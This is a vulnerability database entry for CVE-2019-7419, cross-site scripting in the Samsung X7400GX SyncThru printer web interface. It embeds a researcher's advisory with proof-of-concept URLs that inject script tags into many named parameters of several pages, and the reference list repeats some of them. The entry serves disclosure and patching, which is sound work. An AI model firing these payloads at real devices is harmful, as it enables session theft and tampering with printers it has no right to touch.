Sign-up

ID

VAR-201903-0462


CVE

CVE-2019-7419


TITLE

SAMSUNG X7400GX SyncThru Web Service Vulnerable to cross-site scripting

Trust: 0.8

sources: JVNDB: JVNDB-2019-002786

DESCRIPTION

SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7418 # Category: webapps 1. Description XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters: flag, frame, func, and Nfunc. 2. Proof of Concept URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &msg=The%20requested%20report(s)%20will%20be%20printed Parameter frame=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter flag=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter Nfunc=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter func=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter type=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter popupid=<SCRIPT>alert("XSS");</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7419 # Category: webapps 1. 2. Proof of Concept URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=Maintenance&ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E Parameter ruiFw_title=<SCRIPT>alert(XSS);</SCRIPT> URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_title=Mantenimiento Parameter ruiFw_pid=<SCRIPT>alert(XSS);</SCRIPT> URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_pid=Maintenance&ruiFw_title=Mantenimiento Parameter ruiFw_id=<SCRIPT>alert(XSS);</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7420 # Category: webapps 1. Proof of Concept URL http://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E Parameter tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7421 # Category: webapps 1. 2. Proof of Concept URL http://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org Parameter contextpath=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&popupid=id_Login Parameter basedURL=<SCRIPT>alert(XSS);</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules -->

Trust: 0.9

sources: JVNDB: JVNDB-2019-002786 // VULHUB: VHN-158854 // PACKETSTORM: 151584

AFFECTED PRODUCTS

vendor:samsungmodel:syncthru web servicescope:eqversion: -

Trust: 1.0

vendor:samsungmodel:x7400gxscope:eqversion:6.a6.25

Trust: 1.0

vendor:samsungmodel:syncthru web servicescope: - version: -

Trust: 0.8

vendor:samsungmodel:x7400gxscope: - version: -

Trust: 0.8

sources: JVNDB: JVNDB-2019-002786 // NVD: CVE-2019-7419

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2019-7419
value: MEDIUM

Trust: 1.0

NVD: CVE-2019-7419
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201902-579
value: MEDIUM

Trust: 0.6

VULHUB: VHN-158854
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2019-7419
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-158854
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2019-7419
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 2.7
version: 3.0

Trust: 1.8

sources: VULHUB: VHN-158854 // JVNDB: JVNDB-2019-002786 // CNNVD: CNNVD-201902-579 // NVD: CVE-2019-7419

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-158854 // JVNDB: JVNDB-2019-002786 // NVD: CVE-2019-7419

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201902-579

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 151584 // CNNVD: CNNVD-201902-579

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2019-002786

PATCH
title:Top Pageurl:http://www.samsungprinter.com/
Trust: 0.8
title:SAMSUNG X7400GX SyncThru Web Service Security vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=89377
Trust: 0.6
sources:
            
            
            JVNDB: JVNDB-2019-002786 // 
            
            
            
            CNNVD: CNNVD-201902-579

EXTERNAL IDS
db:NVDid:CVE-2019-7419
Trust: 2.6
db:PACKETSTORMid:151584
Trust: 2.6
db:JVNDBid:JVNDB-2019-002786
Trust: 0.8
db:CNNVDid:CNNVD-201902-579
Trust: 0.7
db:VULHUBid:VHN-158854
Trust: 0.1
sources:
            
            
            VULHUB: VHN-158854 // 
            
            
            
            JVNDB: JVNDB-2019-002786 // 
            
            
            
            PACKETSTORM: 151584 // 
            
            
            
            CNNVD: CNNVD-201902-579 // 
            
            
            
            NVD: CVE-2019-7419

REFERENCES
url:http://packetstormsecurity.com/files/151584/samsung-x7400gx-sync-thru-web-cross-site-scripting.html
Trust: 3.1
url:http://www.samsung.com/support/productsupport/download/index.aspx
Trust: 1.8
url:http://seclists.org/fulldisclosure/2019/feb/28
Trust: 1.7
url:http://www.samsungprinter.com/
Trust: 1.7
url:https://nvd.nist.gov/vuln/detail/cve-2019-7419
Trust: 1.5
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7419
Trust: 0.8
url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=alert&bullet=suc&func=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org&nfunc=closepopup('successmsg
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2019-7421
Trust: 0.1
url:http://x.x.x.x/sws/leftmenu.sws?ruifw_id=%3cscript%3ealert(xss);%3c/script%3e&ruifw_pid=maintenance&ruifw_title=mantenimiento
Trust: 0.1
url:http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion&ruifw_pid=maintenance&ruifw_title=%3cscript%3ealert(xss);%3c/script%3e
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2019-7418
Trust: 0.1
url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org&bullet=suc&func=&nfunc=closepopup('successmsg
Trust: 0.1
url:https://www.owasp.org/index.php/xss_(cross_site_scripting)_prevention_cheat_sheet#xss_prevention_rules
Trust: 0.1
url:http://x.x.x.x/sws.login/gnb/loginview.sws?basedurl=%3cscript%3ealert(xss);%3c/script%3e&popupid=id_login
Trust: 0.1
url:http://x.x.x.x/sws.login/gnb/loginview.sws?contextpath=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org
Trust: 0.1
url:http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion&ruifw_pid=%3cscript%3ealert(xss);%3c/script%3e&ruifw_title=mantenimiento
Trust: 0.1
url:http://www.samsungprinter.com/,
Trust: 0.1
url:http://x.x.x.x/sws.application/information/networkinformationview.sws?tabname=%3cscript%3ealert(%22xss%22);%3c/script%3e
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2019-7420
Trust: 0.1
url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=alert&bullet=suc&func=&nfunc=closepopup('successmsg
Trust: 0.1
url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=alert&bullet=suc&func=&nfunc=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org&flag=&frame=&msg=the%20requested%20report(s)%20will%20be%20printed
Trust: 0.1
sources:
            
            
            VULHUB: VHN-158854 // 
            
            
            
            JVNDB: JVNDB-2019-002786 // 
            
            
            
            PACKETSTORM: 151584 // 
            
            
            
            CNNVD: CNNVD-201902-579 // 
            
            
            
            NVD: CVE-2019-7419

CREDITS
Rafael Pedrero
Trust: 0.1
sources:
            
            
            PACKETSTORM: 151584

SOURCES
db:VULHUBid:VHN-158854
db:JVNDBid:JVNDB-2019-002786
db:PACKETSTORMid:151584
db:CNNVDid:CNNVD-201902-579
db:NVDid:CVE-2019-7419

LAST UPDATE DATE
2024-11-23T22:12:08.760000+00:00

SOURCES UPDATE DATE
db:VULHUBid:VHN-158854date:2019-03-25T00:00:00
db:JVNDBid:JVNDB-2019-002786date:2019-04-22T00:00:00
db:CNNVDid:CNNVD-201902-579date:2019-04-01T00:00:00
db:NVDid:CVE-2019-7419date:2024-11-21T04:48:11.397

SOURCES RELEASE DATE
db:VULHUBid:VHN-158854date:2019-03-21T00:00:00
db:JVNDBid:JVNDB-2019-002786date:2019-04-22T00:00:00
db:PACKETSTORMid:151584date:2019-02-08T02:22:22
db:CNNVDid:CNNVD-201902-579date:2019-02-08T00:00:00
db:NVDid:CVE-2019-7419date:2019-03-21T16:01:12.860